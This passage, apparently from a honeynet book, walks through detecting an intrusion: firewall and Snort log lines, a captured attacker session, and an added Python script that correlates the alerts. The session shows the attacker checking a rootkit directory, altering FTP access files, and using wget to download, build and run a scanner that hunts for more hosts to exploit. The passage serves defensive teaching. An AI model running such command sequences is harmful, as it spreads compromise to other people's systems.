Once your honeynet is live, what happens next? You will run into events like the following examples. Here's a probe (reported by the iptables firewall):

    Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=E.V.I.L DST=H.O.N.EY LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP SPT=2934 DPT=21 WINDOW=8192 RES=0x00 SYN URGP=0

This example is a successful exploit (reported by Snort):

    06/25-18:15:03.586794 [**] [1:1378:7] FTP wu-ftp file completion attempt { [**] [Classification: Misc Attack] [Priority: 2] {TCP} 63.161.21.75:3976 -> 10.1.1.2:21

Here's an owned system (reported by Snort):

    Jun 25 18:017:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.1.1.2:21 -> 63.161.21.75:3977

The next example is an attacker command session in which he checks who is on the system, secures it, gets his attack scanner, and starts looking for more boxes to exploit (this is the actual captured session, but the web address has been modified):

    w
    ls
    cd /dev/ida
    ls
    echo "anonymous" >> /etc/users
    echo "ftp" >>/etc/ftpusers
    echo "anonymous" >>/etc/ftpusers
    echo "anonymous" >> /etc/user
    wget www.geocities.com/replaced_for_privacy/awu.tgz
    tar zxvf awu.tgz
    cd aw
    make
    ./awu 63.190

It is interesting to note that by using cd /dev/ida; ls the attacker checks whether his rootkit installed correctly in this location. He also performs simple system hardening in order to prevent re-exploitation by his "friends" (note that disabling anonymous FTP access closes this particular hole). This technique is a standard practice of modern script kiddies.
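As an added example (not code from the book), the following Python script correlates the three detection stages shown above, the firewall probe, the inbound Snort exploit alert and the outbound ATTACK RESPONSES alert, into one per-attacker timeline, so an analyst can tell a probed honeypot from an owned one at a glance. The log lines inside it are constructed after the formats shown, and 10.1.1.0/24 as the honeynet range is an assumption.

```python
import re
from ipaddress import ip_address, ip_network

# Assumption: the honeynet lives in 10.1.1.0/24 (the book only shows 10.1.1.2).
HONEYNET = ip_network("10.1.1.0/24")

# Constructed sample lines modelled on the book's iptables and Snort formats.
IPTABLES_LOG = [
    "Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=63.161.21.75 "
    "DST=10.1.1.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP "
    "SPT=2934 DPT=21 WINDOW=8192 RES=0x00 SYN URGP=0",
]
SNORT_LOG = [
    "06/25-18:15:03.586794 [**] [1:1378:7] FTP wu-ftp file completion attempt "
    "[**] [Classification: Misc Attack] [Priority: 2] {TCP} "
    "63.161.21.75:3976 -> 10.1.1.2:21",
    "Jun 25 18:17:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned "
    "root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} "
    "10.1.1.2:21 -> 63.161.21.75:3977",
]

# Pulls sid, message text and the flow endpoints out of a Snort alert line.
SNORT_RE = re.compile(
    r"\[(?P<sid>\d+:\d+:\d+)\] (?P<msg>.+?) (?:\[\*\*\] )?"
    r"\[Classification: [^\]]+\] \[Priority: \d+\]:? "
    r"\{\w+\} (?P<src>\S+):\d+ -> (?P<dst>\S+):\d+"
)

def parse_iptables(line):
    """Turn the KEY=VALUE tokens of an iptables log line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def build_timeline(iptables_log, snort_log):
    """Return (attacker, honeypot, stage, detail) tuples in log order."""
    events = []
    for line in iptables_log:                # stage 1: inbound SYN = probe
        f = parse_iptables(line)
        if "SYN" in line and ip_address(f["DST"]) in HONEYNET:
            events.append((f["SRC"], f["DST"], "probe", f"dpt {f['DPT']}/{f['PROTO']}"))
    for line in snort_log:
        m = SNORT_RE.search(line)
        if not m:
            continue
        src, dst = m["src"], m["dst"]
        if ip_address(dst) in HONEYNET:      # stage 2: alert on inbound traffic
            events.append((src, dst, "exploit_attempt", m["msg"]))
        elif ip_address(src) in HONEYNET:    # stage 3: honeypot answering back
            events.append((dst, src, "compromise_indicator", m["msg"]))
    return events

def compromised_hosts(events):
    """Honeypots for which an outbound attack-response alert was seen."""
    return sorted({hp for _, hp, stage, _ in events if stage == "compromise_indicator"})

if __name__ == "__main__":
    print(*build_timeline(IPTABLES_LOG, SNORT_LOG), sep="\n")
```

The direction of the alert is what separates stage 2 from stage 3: an alert whose source is inside the honeynet means the honeypot itself is now emitting attack traffic or responses.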